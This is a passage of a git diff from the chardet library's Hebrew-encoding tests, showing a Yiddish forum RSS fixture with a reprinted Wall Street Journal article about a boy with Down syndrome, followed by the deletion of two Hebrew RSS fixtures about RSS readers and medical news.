    Tue, 3 Jan 2006 07:06 +0200ברוך מתיר אסירים ר' אהרן ישעי' איז פריי 07:06eichlerTue, 3 Jan 2006 07:06 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1740100Tue, 3 Jan 2006 05:09 +0200דער איד און דער בלאט אין מאנסי STORES 05:09מציאותTue, 3 Jan 2006 05:09 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745449פאר אפאר חדשים צוריק, האבן די רבנים ארויס גענומן די צוויי צייטונגען פון די מאנסי געשעפטן, לעצטע וואך זעה איך אז זיי זענען צוריק, צו ווייסט איינער וואס איז געשעהן?
    IT SOUNDS SUSPICIOUS
    ]]>
    Tue, 3 Jan 2006 01:58 +0200איז דא ערגעץ זאת חנוכה טישן מאנטאג? 01:58חלילה_וחסTue, 3 Jan 2006 01:58 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1746019
    (א טיש וואס ציט זיך אריין ביז שפעט)

    כ'ווייס שוין פון צוויי: סקולען און סטיטשין. אבער אויב כ'פאר שוין וויל איך קענען גיין צו נאך רבי'ס (וואס טוט מען נישט פאר קינדער...)]]>
    Tue, 3 Jan 2006 00:14 +0200איך דריי זוך ארום מיט מיין זעקל קנויטען 00:14CatskillsTue, 3 Jan 2006 00:14 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745908Mon, 2 Jan 2006 23:39 +0200ווארלד טרעיד סענטער קאנספיסי מאווי 23:39eichlerMon, 2 Jan 2006 23:39 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1739827Mon, 2 Jan 2006 23:35 +0200Microsoft lets consumers try new securit 23:35y123y123Mon, 2 Jan 2006 23:35 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745859The company is making its Windows OneCare Live service available for free in a "beta," or test version, to help it work out any potential problems before the product's likely introduction next year.
    The service, which offers anti-virus, firewall, backup and recovery, as well as personal computer maintenance, will eventually be available for a subscription fee, said Microsoft spokeswoman Samantha McManus. The company has not yet determined how much it will charge. "This is the first major step for Microsoft into the consumer security market," McManus said, noting about 15,000 customers have been taking part in a limited test since June.

    http://jewishcenteronline.com/forums/showthread.php?t=37]]>
    Mon, 2 Jan 2006 22:32 +0200האט "בטחון" וועט אלעס זיין גוט... 22:32דיפלאמאטMon, 2 Jan 2006 22:32 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745548
    מענטשן האבן א טעות איז דעם מושג פון בטחון און מיינען אז דער אפטייטש דערפון איז, צו זיין פארזיכערט אז עס גייט מיר זיין גוט, לויט ווי "איך" וויל עס זאל זיין.

    דאס איז א גרויסער טעות, ווייל בטחון מיינט אז עס וועט מיר זיין גוט, לויט ווי דער באשעפער זעט אז דאס איז אין מיינע בעסטע אינטערעסן.

    א שטיקל חובת הלבבות (פרק א) וואס ברענגט ארויס וואס דאס איז:

    מהות הבטחון הוא, מנוחת הנפש של בעל הבטחון, ושיהיה לבו סמוך על מי שהוא בוטח עליו, שהוא עושה את מה שהוא טוב ונכון עבורו, בדבר שהוא בוטח עליו, בהתאם ליכלתו וידיעתו בדברים שהם לטובתו.

    עס איז דא פיל פיל צו שרייבן אין דעם ענין. איך האף זיך צוריקצוקערן דערצו גאר בקרוב.
    ]]>
    Mon, 2 Jan 2006 19:33 +0200די אויל פון משפט שלום איז נישט קיין אויל 19:33eichlerMon, 2 Jan 2006 19:33 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1744424Mon, 2 Jan 2006 11:22 +0200וואס מיינט די קונטערס 'צדק צדק תרדוף'? 11:22אלעסאמתMon, 2 Jan 2006 11:22 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1716332Mon, 2 Jan 2006 05:38 +0200עד היכן תכלית משוגענע אדווערטייזמענטס? 05:38נבוכדנאצרMon, 2 Jan 2006 05:38 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1739091
    ופרצו
    חומות
    מגדלי

    וויאזוי איז דאס געשעהן?

    ווייל עס איז נישט געמאכט געווארן ביי אונז!

    און עס איז דא א בילד פון חומות ירושלים געמישט מיט א בילד פון א אויפגעריסענעם צוים, און דער אדווערטייזער איז א צוים פאבריקאנט.

    פרעג איך: איז דאס מ ש ו ג ע ת אדער ע מ ה א ר צ ו ת? די חומת המקדש איז פרצו בה י"ג פרצות ווייל מען האט עס נישט געמאכט ביי די פירמע פון מאנסי?

    בין איך משוגע אדער ער?

    כ'בין שוין געוואוינט צו זעהן אז מיט א שטריימל למטה מעשרה טפחים און אהן א טלית שכולה עטרת כסף קען מען נישט צוגיין צום יום הדין, און אודאי אודאי נישט אהן א Chanuka Gift צום הייליגן יום טוב חנוכה, שוין געווען אן אשכול דערוועגן, אבער על של עתה באתי, עד היכן תכלית משוגעת? ס'הייסט דאך א פרומע צייטונג!

    אויב איינער דא האט עס - ביטע אריינסקענען, עס איז געוואלדיג]]>
    Mon, 2 Jan 2006 00:03 +0200NYC Parking Tickets Eased In Past Year 00:03ShamosMon, 2 Jan 2006 00:03 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1744252
    The NYPD eased up on parking tickets in 2005 after a year-and-half-long rise, city records show.


    http://vosizneias.blogspot.com/2006/01/nyc-parking-tickets-eased-up-in-2005.html

    ]]>
    Sun, 1 Jan 2006 23:46 +0200נאכקאפירן טעיפס סידיס מותר? או אסור? 23:46אינגערמאןSun, 1 Jan 2006 23:46 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1734562
    איך האב געטראפן 2 בריוון פון רבנים אין דעם נושא, פאר "אדרת"

    ]]>
    Sun, 1 Jan 2006 22:57 +0200צדקה פאר איינעם וואס וויל נישט ארבעטן 22:57דיפלאמאטSun, 1 Jan 2006 22:57 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1733404
    איך בין זיכער אז יעדער קען איינעם אדער צוויי, וואס גייט נאך געלט ווייל ער איז א גרויסער ארימאן, אבער ווען מען באטראכט אים פון דער נאנט, זעט מען אז זיין גאנצער עניות נעמט זיך נישט ווייל ער איז א שלימזל א לא יוצלח, נאר ווייל ער איר א פשוט'ער פוילער שטריק, און האלט נישט ביים גיין ארבעטן ווי דער סדר העולם איז, און עס איז אים גרינגער צו גיין פון נגיד צו נגיד, וואס איז, ווי די יודעי דבר וועלן אייך דערציילן גאנץ א גוטער פרנסה, ווייל געווענליך דארף מען אריינלייגן פיל ווייניגער שעות און מען קען פארדינען הערליך-שיין דורך שנארעריי.

    שטעלט זיך די פראגע, און אסאך האבן שוין זיכער אפגע'פסק'נט אז אזא איינעם דארף מען נישט געבן, און אדרבה פילע האבן שוין אפגעמאכט אז מען "טאר נישט" געבן אזא איינעם, ווייל דאס איז נישט ווי די וועלט איז אויסגעשטעלט געווארן, נאר מען דארף גיין ארבעטן כדי צו פארדינען.

    איך וועל נישט מאכן קיינע לאנגע הקדמות און דא שטעלן עטליכע מראה מקומות ווי אנצוהייבן.

    אין סמ"ק שטייט אזוי: "לא תאמץ, שלא תאמר מה לנו לסייע לפלוני אם היה רוצה היה מרויח יותר מצרכו תלמוד לומר לא תאמץ". זעט מען אז מען דארף געבן אפי' אויב וואלט ער געקענט גיין ארבעטן.

    ווידער איז דא א שטיקל כלי יקר וואס האלט פונקט פארקערט, נאר איך האב עס נישט פאר מיר, אפשר שפעטער וועט עס נאכקומען.
    ]]>
    Sun, 1 Jan 2006 22:53 +0200ערשטע לעכטל ביים כותל יעצט live 22:53purim2005Sun, 1 Jan 2006 22:53 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1732319http://www.tvisrael.net/tvisrael/chanel.asp?chanel=3]]>Sun, 1 Jan 2006 22:46 +02002006 Will Start A Second Later Than Expe 22:46ShamosSun, 1 Jan 2006 22:46 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1739631
    The year 2006 is going to come in with one second later than expected.
    The scientists in charge of maintaining world time have to insert a "leap second," in order to keep atomic time sync'd up with the Earth's rotational time.


    http://vosizneias.blogspot.com/2005/12/year-2006-will-start-one-second-later.html

    ]]>
    Sun, 1 Jan 2006 20:57 +0200Trump פאר גאבענאר? 20:57kutchmaSun, 1 Jan 2006 20:57 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1742976Republican: Trump May Run for N.Y. Gov.

    The Associated Press
    Saturday, December 31, 2005; 11:41 AM



    ALBANY, N.Y. -- Donald Trump is considering running for governor, a leading Republican said Friday. Senate Majority Leader Joseph Bruno on Thursday suggested that a big-name candidate could be flirting with entering the 2006 contest. On Friday, he confirmed to News Channel 10 in Albany that he had been referring to Trump.

    Bruno told the station he had spoken to the real estate developer and TV personality about a possible run.

    Trump's office in New York had no immediate comment. State GOP Executive Director Ryan Moses said neither he nor state party Chairman Stephen Minarik have had discussions with Trump about running.

    Said Frank MacKay, state chairman of the Independence Party: "(Trump) is a formidable candidate for anything he decides to run for. We would love to see him run for president of the United States in 2008 as a third-party candidate. I'd do what I could to help give him a strong base here in New York and everywhere else in the country."

    Trump flirted with a run for president on the Reform Party ticket in 2000. He has given money to Republicans and Democrats in state races.

    Republicans are looking for a candidate with name recognition and money to take on the only announced Democratic candidate, state Attorney General Eliot Spitzer. Spitzer is far ahead of all candidates for governor in the early polls.

    Spitzer won an endorsement Friday from former New York City Mayor Ed Koch, who cited his fellow Democrat's record as a corporate reformer.

    "As attorney general, he demonstrated a real commitment to reforming institutions from Wall Street to Main Street, and I look forward to watching him work on reforming state government," Koch said at a news conference.

    Koch, a Democrat, endorsed Republican Gov. George E. Pataki for re-election in 2002. Pataki has announced he will not seek a fourth term.

    Spitzer is the lone Democrat in the race, although some Democrats say Thomas Suozzi, executive of Nassau County on Long Island, is considering entering the race.

    Announced Republican candidates include former Massachusetts Gov. Bill Weld, former Assemblyman John Faso, former Secretary of State Randy Daniels and Assemblyman Patrick Manning.


    http://www.washingtonpost.com/wp-dyn/content/article/2005/12/31/AR2005123100376_pf.html

    ]]>
    Sun, 1 Jan 2006 20:51 +0200פרייליך אין קרעטשניף 20:51wassa_difSun, 1 Jan 2006 20:51 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1743917Sun, 1 Jan 2006 16:33 +0200הילפ מיט יאהא מעיל 16:33bush2008Sun, 1 Jan 2006 16:33 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1740150איך האב אפאר
    yahoo mail ID's
    למשל משה אין יעקב סא איך האב געמאכט א טשעק ביי
    Remember my ID on this computer
    אויף משה'ס איי די אבער מיין פראבלעם איז אז ווען איך וויל גיין צי יעקב גייט די קאמפיאטער אליין אריי צי משה אין איך מיז ארויס סיינען פין משה אין שפעטער אנהייבען אריין צי לייגען די איי די אין פעס ווארד פין יעקב אין די נעקסטע מאל וועט די קאמפיאער געדענקען נאר יעקב
    סא איך וויל וויסען ווי אזוי מ' מאכט אז די קאמפיאטער זאל געדענקען מער ווי איין פעס ווארד אין אויך אז איך זאל קענען אויס וועלען אין וועלכע איי די אריין צי גיין נישט די קאמפאטער זאל אליינס אריין גיין צי די איי די וועלעכע איך בין געווען די לעצטע
    Who ever knows how to do it please post because I plotz already

    תוקן על ידי - bush2008 - 30/12/2005 8:15:34]]>
    Sun, 1 Jan 2006 15:56 +0200Chasiddish Community In Philadelphia? 15:56ShamosSun, 1 Jan 2006 15:56 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1743408
    Philadelphia - The Hasidic rabbi Solomon Isaacson roams the halls of power brokers - his black suit, white shirt and broad-brimmed black hat - never changes, and the only food he offers them is challah, a bread delivered in person and free to the offices of most elected officials in City Hall, usually every week, he delivers 600 challahs a week. And he is widely perceived as a man of political influence.
    And like any insider, Isaacson wants something for the client he sees as his, the Jewish people.
    His latest pursuit: a large swath of land in Northeast Philadelphia for new townhouses and single-family homes so that hundreds of Chasidic Jewish families can relocate here from the saturated streets of Brooklyn.


    http://vosizneias.blogspot.com/2006/01/philadelphia-rabbi-working-on-getting.html

    ]]>
    Sun, 1 Jan 2006 12:38 +0200א געשעפט! coming soon 12:38אזלא_גרשSun, 1 Jan 2006 12:38 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1515678לויט ווי מען געט איבער גייט עס זיין א גרויסע סוקסעס

    דא קען מען דאונלאדען די trailer
    http://s46.yousendit.com/d.aspx?id=14SZXE04G83T90QKLM02WQRJDD]]>
    Sun, 1 Jan 2006 05:49 +0200Special Ed article front page WSJ today 05:49babyfishSun, 1 Jan 2006 05:49 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1742883December 31, 2005





    DOW JONES REPRINTS


    This copy is for your personal, non-commercial use only. To order presentation-ready copies for distribution to your colleagues, clients or customers, use the Order Reprints tool at the bottom of any article or visit:
    www.djreprints.com.

    • See a sample reprint in PDF format.
    • Order a reprint of this article now.

    Eli's Choice

    His parents fought for boy with Down syndrome to be in the mainstream. As a teenager, he just wanted to be with his friends.
    By AMY DOCKSER MARCUS
    Staff Reporter of THE WALL STREET JOURNAL
    December 31, 2005; Page A1

    BETHESDA, Md. -- For years, Eli Lewis was the only student in his class with Down syndrome.

    The genetic condition, which causes a range of cognitive and physical impairments, made it harder for him to do his school work. But his parents felt strongly that he could succeed. They hired a reading tutor. An aide worked with his teachers to modify tests and lessons so that he could be in the same classroom as everyone else. He participated in his middle school's award-winning chorus and was treated as a valued member.

    But when all the other kids in his class were making plans to go to the local high school this fall, Eli, 14 years old, said he didn't want to go. He wanted to be in a small class with other students like him. "I don't want to get lost in a big crowd," Eli says.


    Kids in the Hall: Eli Lewis, flanked by his buddies, Chris Hamilton-Bruen (left) and Jamie Verhoff (right).


    Eli's declaration surprised his parents. Then his mother recalled the many times she stopped by the school to check on her son, only to find him eating by himself. Once, when she came to pick him up from a dinner that chorus members attended, she says she found Eli sitting with his aide, while the other students sat at a different table.

    "The kids liked him, they knew him, they spoke to him," says his mother, Mary Ann Dawedeit. "They just didn't think of him as a peer." Eli, she says, was tired of "being the only kid who was different."

    Federal law mandated in the 1970s that children with disabilities be offered a "free and appropriate public education" in the "least restrictive environment," rather than being separated only in special schools or institutions. Over the years, advocacy and additional laws resulted in efforts to get children with disabilities placed in regular classrooms, with proper support, whenever possible. The process, called "inclusion" or "mainstreaming," has largely been an academic success.

    Studies have shown benefits for all children, not only those with disabilities, who study together. Many researchers argue this is one reason why people with Down syndrome have made such remarkable progress in recent decades. People with Down syndrome who learn in regular classrooms do much better academically, research has found. They also have significantly higher rates of employment after they graduate and earn more money than peers who studied mainly in self-contained classes.

    And yet, Eli Lewis's experience poses a difficult dilemma, one that is only now starting to be recognized and addressed. With help, he had succeeded academically in a regular classroom. But he felt isolated. In a book to be published next year, researchers at the Center for Social Development and Education at the University of Massachusetts in Boston say that although people with intellectual disabilities made enormous gains academically due to inclusion, their social integration at school "remains stagnant."

    In a survey of 5,600 seventh- and eighth-grade students from 70 schools across the country, more than half of the youths said they were willing to interact with students with intellectual disabilities at school. But only one-third said they would be willing to invite such students to their house or go to the movies with them, according to the survey done by the University of Massachusetts center and the Washington-based opinion firm, ORC Macro. "Student attitudes continue to remain the most formidable barrier to inclusion," the researchers concluded.

    At first, Ms. Dawedeit and her husband, Howard Lewis, thought Eli might change his mind. The couple -- who have two other sons who don't have Down syndrome -- felt there were many advantages to Eli staying in a regular classroom, including greater independence and more interaction with the general student body. But eventually, Mr. Lewis says he began to recognize that having Eli in a regular classroom might not be "as important to Eli as it is to me."

    Ms. Dawedeit remained reluctant. She talked with a friend who had a son with Down syndrome, who was also learning in a regular classroom. "I felt like I had let her down," Ms. Dawedeit says. "I had preached a mantra for so long to so many."

    In May, at the science exposition at Eli's middle school, her feelings changed. The eighth-graders took over the school hallway and parents were invited to visit. Some students demonstrated elaborate experiments they had been working on. Eli worked with his aide to do research online about the chemical properties of silver. He learned where to find it on the periodic table. For the exposition, he printed out some of the documents he had found.

    When his mother came to see his project, Eli again raised the subject of where he was going to high school. For Ms. Dawedeit, the contrast was sharp. Here was Eli, successfully participating in a science exposition with peers who didn't have disabilities -- but still talking about wanting to be with other people with Down syndrome.

    She says she realized she needed to try to accommodate her son's desire for a social group. "I really had to step back from my personal beliefs," she says.

    In the fall, Eli enrolled in the ninth grade at Bethesda's Walter Johnson High School, a sprawling building of over 2,000 students. He is in a special program with 20 other students who have disabilities, including one who gets around in a wheelchair and has difficulty talking. Six of the students in the class have Down syndrome. Eli already knew some of the kids from various extracurricular activities, such as drama class and Special Olympics, where he participated in soccer, basketball, swimming and bowling.


    Eli with his family: father, Howard Lewis, mother, Mary Ann Dawedeit, and brothers, Eric Lewis, 17, and Ezra Lewis, 12, at their home in Chevy Chase, Md.


    Getting out of the mainstream has meant trade-offs. His school is about 10 miles from Eli's house, farther than the local high school that his older brother attends. (The local high school doesn't have a separate special-education program.) A special-education bus now comes each day to pick up Eli, along with other students with disabilities.

    "This was one of our big compromises," says his mother. In middle school, Eli walked to a bus stop and rode a regular school bus. "Other kids knew him," says Ms. Dawedeit. "Now he's a special-ed kid on a bus."

    One evening in November, after a dinner of chicken burritos and salad, Eli helped his brothers, ages 12 and 17, clear the dishes. Then his parents watched him, as he started making his way through his homework -- a worksheet to practice using nouns and verbs. Since Eli was born, they had fought to have him included in regular classrooms. Now it sometimes felt as if Eli might end up outside the world they had tried so hard to keep him in.

    All along, they shared a similar goal: for their son to be able to live independently. But Mr. Lewis, a lawyer, began to worry that the academic gap between Eli and other classmates was getting wider in the regular classroom as he grew older, and might be too difficult to bridge in high school. "I'm not married to inclusion at the expense of Eli's getting the skills he needs," he says.

    Ms. Dawedeit, a manager at a retail store, was less certain. She knew how much Eli, like all kids his age, wanted to belong. But without spending significant amounts of time in regular classrooms, how would he ever learn the skills he needed to reach the goal of living on his own? "The truth is he has to go out and get a job," she says. "If he's educated with his regular peers, then maybe a regular peer will hire him."

    Eli finished his English worksheet, and got up to take a break. He came over and gave his father a hug. "Are you meeting any new kids at school, Eli?" his dad asked. "Not just yet, Dad," Eli answered. "Why are you hanging out only with the kids in your class?" his father queried. "Because I know them," Eli answered, and went into the kitchen to get some cookies.

    At his new school, the Parent Teacher Student Association has put the issue of how to promote the inclusion of students with disabilities in extra-curricular activities on the agenda for its January meeting. A student group that pairs students with disabilities with a buddy without disabilities has already scheduled several activities for the coming months, including ice skating and bowling.

    Still, for most of his school day, Eli is now in a separate classroom from the general school population. Last month, ninth-graders in the general-education classes were reading the novel, "To Kill a Mockingbird." In the special-education classroom, the teacher was going over worksheets that had been adapted from the book, with some related questions.

    Eli was signed up for a regular physical-education class, but asked his parents if he could switch to one with only special-education students. His mother was reluctant to change, because it was one of his only chances to meet kids in the general-student population. She offered a compromise: He could switch to the special-education gym class with his friends, if next semester he took weight-training as part of the regular class. Eli agreed.

    Janan Slough, the assistant principal who oversees the special-education department at Eli's school, says the school has difficulty finding certified special-education teachers because of a national shortage.

    The school tries to foster as many opportunities as possible for those with disabilities to be in general classrooms, she says. Still, she adds, "I feel caught" between juggling the need for socializing with the need to teach basic, crucial tasks, such as handling money. On one field trip, the special-education kids went to a grocery store; they were supposed buy something their family might use at home, pay for it, and make sure they got correct change.

    Most of the kids with disabilities need to focus on independent-living and job skills, rather than college preparation. "I'm charged with thinking about where they are going to be at 21," she says. "I don't want parents to come back and say, 'It's nice they were socially included and had parallel instruction, but you didn't prepare them for the world of work.' "

    For now, Eli has only one class -- ceramics -- that he attends with the general school population. On a recent morning, Eli sat next to a boy assigned to help him. The students were designing tiles, and from time to time his peer assistant would look at what he was doing, or go with him to get more clay. For much of the class, the boy bantered with one of his friends, who had pulled up a chair next to him and was regaling him with a story. From time to time, Eli made a joke and the boys all laughed together.


    Eli with his friends and fellow freshmen Chris Hamilton-Bruen, 14, and identical twins Will and Jamie Verhoff, 15.


    But when they walked Eli back to the special-education classroom, there was no suggestion that they meet up again that day. When Eli was asked if he enjoyed spending time with his assigned partner, he shrugged and said, "It's OK."

    Eli has a lot of ideas about what he wants to do after high school. In middle school, he took a media class and worked in the school's TV studio. Along with the other kids in the class, he was given a homework assignment to make a public-service announcement. Eli made one about the Special Olympics. "I want to be a director," he said, when asked about his plans after high school.

    "Eli has serious career aspirations for himself that may not have anything to do with what the rest of the world sees for him after high school," said his mother, one afternoon last month, while waiting for him at a drama class he takes outside of school. The class, made up of students with and without disabilities, was planning a variety show, and Eli was excited about performing. Every night, he went to his room to work on a dance routine he had created to accompany a song from the soundtrack of the movie, "Holes."

    His girlfriend, whom he met in elementary school and also has Down syndrome, had invited him to be her date to the upcoming Winter Ball at her private school. Next month, Eli will turn 15 and is planning a big party. The only kids he plans to invite also have disabilities, his mother says.

    While she's glad he has found a social circle, she still wonders about what he's missing by going to special-education classes instead of staying in regular classes. "I go back and forth on it all the time," she says. For instance, his school has a state-of-the-art TV studio with editing facilities and a control room, where a class is given. Eli's parents wanted him to be in that class, but it's not possible right now, because he needs to attend the special-education math class, which is held during the same period.

    On a recent morning at school, Eli weaved around the teenagers lining the hallway. Some sprawled on the floor, catching up on homework. Others joked with each other by their lockers, or rushed to get to their next class. Eli didn't talk to any of the students. He walked with purpose, heading to the special-education room.

    When he got there, his face brightened when he saw one of his friends. "This is my best friend," he said, throwing his arm around the other boy, who also has Down syndrome. He pressed his face close to his friend's until their cheeks almost touched. Eli smiled. "What table are you sitting at lunch today?" he said as they walked together down the hall. "Come on, make sure you sit with me."

    Write to Amy Dockser Marcus at amy.marcus@wsj.com1

    URL for this article:
    http://online.wsj.com/article/SB113598974559935259.html


    Hyperlinks in this Article:
    (1) mailto:amy.marcus@wsj.com


    Copyright 2005 Dow Jones & Company, Inc. All Rights Reserved This copy is for your personal, non-commercial use only. Distribution and use of this material are governed by our Subscriber Agreement and by copyright law. For non-personal use or to order multiple copies, please contact Dow Jones Reprints at 1-800-843-0008 or visit www.djreprints.com.


    תוקן על ידי - babyfish - 01/01/2006 5:47:57]]>
    \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/info.org.il.xml b/chardet/tests/windows-1255-hebrew/info.org.il.xml deleted file mode 100644 index 3421b7a..0000000 --- a/chardet/tests/windows-1255-hebrew/info.org.il.xml +++ /dev/null @@ -1,179 +0,0 @@ - - - - - -My Hebrew RSS ordeal -http://www.info.org.il/ -נסיון ליצור RSS בעברית -en-us - -כותרות השינוי החברתי באתר שתיל -יצרתי באתר שתיל דף שאוסף כותרות מאתרים שונים על ידי קריאת ערוצי ה RSS שלהם. בדרך גם יצרתי שני ערוצי RSS באתר שתיל. הנה הכתובת shatil.org.il/rss -http://www.info.org.il/rss/index.php#110806156605450986 - - -חלק זה באתר כבר לא מתעדכן (+ עדכונים) -עדכונים לאחר שנה שחלק זה לא התעדכן -http://www.info.org.il/rss/index.php#109532914976076153 - - -יש גם <a href="http://www.dop.co.il/sites/rss/rss.asp">בדיחות</a> ב RSS - -http://www.info.org.il/rss/index.php#106537326456559350 - - -גם לבלוג של אור מאירי יש פיד -הנה -http://www.info.org.il/rss/index.php#200300670 - - -מאמר בעברית על RSS מאת הלמו -הלמו הבלתי נלאה כתב מאמר על RSS. המאמר בעברית הכי מפורט וממצה שקראתי על RSS. כל הכבוד! -http://www.info.org.il/rss/index.php#200190114 - - -עדכונים בישראבלוג -יריב חבוט, היוצר של ישראבלוג, הודיע לי שיש עכשיו RSS שמציג את העדכונים בבלוגים שבישראבלוג. -http://www.info.org.il/rss/index.php#200189626 - - -טולי ממליצה על <a href="http://www.hutteman.com/sharpreader/">SharpReader</a> -כיתבו לי אם גם אתם ממליצים. -http://www.info.org.il/rss/index.php#200173124 - - -גם לפורומים של קונספציה יש RSS -הפורום של קונספציה -http://www.info.org.il/rss/index.php#200146728 - - -<a href="http://info.org.il/english/rss_distractions.html">Are RSS newsreaders such a good idea?</a> -מחשבות שהיו לי בקשר ל RSS שגרם לי לרדת קצת מהעניין. -http://www.info.org.il/rss/index.php#200143122 - - -אני מפסיק את החיפוש -כאן תוכלו למצוא רשימה ענקית של תוכנות לקריאת RSS. -http://www.info.org.il/rss/index.php#200143078 - - -<a href="http://www.awasu.com/">Awasu</a> - עוד תוכנה שלא עובדת - -http://www.info.org.il/rss/index.php#200130385 - - -קריאת RSS מעוצב על ידי XSL -אודי שלח לי את זה. -http://www.info.org.il/rss/index.php#90234144 - - -<a href="http://www.yole.ru/projects/syndirella/">Syndirella</a> -פלטפורמה דוט נט. -http://www.info.org.il/rss/index.php#90234123 - - -ה RSS של pctip.co.il -[ כאן ]. עובר ולידציה. רואים טוב. כל הכבוד.חבל שאין לו description. -http://www.info.org.il/rss/index.php#90204678 - - -ה RSS של pcplus.co.il -לא עובר ולידציהשל Beaver ושל Archive.org -http://www.info.org.il/rss/index.php#90204674 - - -בעיה ב Beaver -תצוגת הדף בחלון התחתון לא מתרפרשת ואז אם עושים קליק כפול על הודעה חדשה, לא רואים אותה. צריך לעשות ריפרוש ידני כדי לראות אותה. -http://www.info.org.il/rss/index.php#90204651 - - -RSS מתוך Movable Type -טולי שלחה לי שלושה קבצים שנוצרו על ידי MT. כל קובץ בקידוד אחר. -http://www.info.org.il/rss/index.php#90204648 - - -NewsIsFree - RSS aggregation site - BAD -טולי המליצה לי על NewsIsFree -http://www.info.org.il/rss/index.php#90204636 - - -Beaver - RSS reader - OK -הפיד שלי עובד ולידציה. -http://www.info.org.il/rss/index.php#90204623 - - -RSS Readers -שוש שלחה לי קישור לדף עם רשימה של תוכנות לקריאת RSS. -http://www.info.org.il/rss/index.php#90204613 - - -לחץ בעבודה -מקווה לעדכן בימים הקרובים. -http://www.info.org.il/rss/index.php#90191461 - - -ברירת מחדל - קרדיט -רק אם תבקשו במפורש, אני אמנע מלתת לכם קרדיט על דברים שתשלחו לי. -http://www.info.org.il/rss/index.php#90181444 - - -יכול להיות שה RSS שלי הוא לא הראשון. -dotkof.org מפרסם את הכותרות שלו בפורמאט RSS [ כאן ]. -http://www.info.org.il/rss/index.php#90181438 - - -EffNews - עוד קורא RSS לרשימה -מבוסס Pyhton, אמור לעבוד על כמה פלטפורמות והכי חשוב, עובד בדפדפן ולא כאפליקציה. יש לי הרגשה שקוראי RSS שעובדים בדפדפן יתמודדו טוב יותר עם העברית. -http://www.info.org.il/rss/index.php#90181423 - - -המשימה, מציאת קוראי RSS שתומכים טוב בעברית -עוד לא מצאתי תוכנה שקוראת RSS בעברית. -http://www.info.org.il/rss/index.php#90176809 - - -RSS, מה זה ולמה זה טוב -RSS הוא ראשי תיבות של Really Simple Syndication -http://www.info.org.il/rss/index.php#90173430 - - -נפתרה בעיית הוספת description לכל item -לפני כתיבת ה description אני מבצע עליו strip_tags כדי לא לבלבל. -http://www.info.org.il/rss/index.php#90173221 - - -מסקנות ביניים -תקן הקידוד של XML הוא יוניקוד. RSS הוא תת תקן של XML. -http://www.info.org.il/rss/index.php#90173198 - - -נסיון להוסיף description לכל item -שוש התקשרה אלי עכשיו ודיברנו הרבה על encoding וכל החרא הזה. היא מבינה לא קטנה בעניינים האלה. -http://www.info.org.il/rss/index.php#90171886 - - -אולי החבר'ה מ comp.text.xml יוכלו לעזור -פרסמתי שאלה מפורטת בקבוצת הדיון comp.text.xml -http://www.info.org.il/rss/index.php#90170456 - - -עבודת יד זה הכי טוב -[ כאן ] אפשר למצוא קובץ RSS שכתבתי ביד ב Notepad ושמרתי כ UTF-8 -http://www.info.org.il/rss/index.php#90166633 - - -זה מה שמוציא בלוגר -[ כאן ] אפשר לראות את ה RSS שמוציא בלוגר. -http://www.info.org.il/rss/index.php#90166441 - - -עברית windows-1255 -[ כאן ] נמצא ה RSS בעברית WIndows-1255. -http://www.info.org.il/rss/index.php#90165987 - - - diff --git a/chardet/tests/windows-1255-hebrew/infomed.co.il.xml b/chardet/tests/windows-1255-hebrew/infomed.co.il.xml deleted file mode 100644 index 6d4c871..0000000 --- a/chardet/tests/windows-1255-hebrew/infomed.co.il.xml +++ /dev/null @@ -1,194 +0,0 @@ - - - - -אינפומד - אתר הרפואה הישראלי -http://www.infomed.co.il - -he-IL -2006-01-04T13:53:35 -2006-01-04T13:53:35 - -InfoMed - The Israeli Web Site -http://www.infomed.co.il/images/infoMedForRss.jpg - - - he-IL - פותחה מערכת אלקטרו- אופטית למיפוי של גידולים במוח במהלך הניתוח - http://www.infomed.co.il/news/n_010406_1.htm - 2006-01-04T13:53:35 -
    המערכת פיתוח של חברת IETMED מהחממה הטכנולוגית "יוזמות העמק" - פרטים נוספים בחדשה
    - חדשות רפואיות -
    - - he-IL - האם ניתן לקבל חיסון אנטי טטנוס בהנקה ? - http://www.infomed.co.il/questions/q_010406_1.htm - 2006-01-04T12:55:10 -
    אין עדות לנזק לאם או לתינוק
    - שאלות ותשובות -
    - - he-IL - על הטפיל Blastocystis hominis . - http://www.infomed.co.il/questions/q_010406_2.htm - 2006-01-04T12:55:10 -
    תשובה מפורטת על טפיל מערכת העיכול
    - שאלות ותשובות -
    - - he-IL - הרזיה לנערה ללא סיכונים - http://www.infomed.co.il/questions/q_010406_3.htm - 2006-01-04T12:55:10 -
    נערה שרוצה לרזות אך פוחדת להיהפך לאנורקסית
    - שאלות ותשובות -
    - - he-IL - טיפול במתיחה או קרע באזור המפשעה - http://www.infomed.co.il/questions/q_010406_4.htm - 2006-01-04T12:55:10 -
    תשובה מפורטת עם קישורים לתרגילים על קרע בשרירי אזור המפשעה
    - שאלות ותשובות -
    - - he-IL - האם ניתן לטפל בכף רגל סוכרתית בעזרת פיזיותרפיה ? - http://www.infomed.co.il/questions/q_010406_5.htm - 2006-01-04T12:55:10 -
    התשובה מפרטת את הנקודות בהן יכולה פיזיותרפיה לסייע
    - שאלות ותשובות -
    - - he-IL - תרופות חדשות באתר - http://www.infomed.co.il/medIndex.asp - 2006-01-04T08:34:55 -
    3 תרופות חדשות נוספו לאינדקס התרופות:
    - קמפטו (אירינוטקאן) לטיפול בסרטן גרורתי של המעי והחלחולת
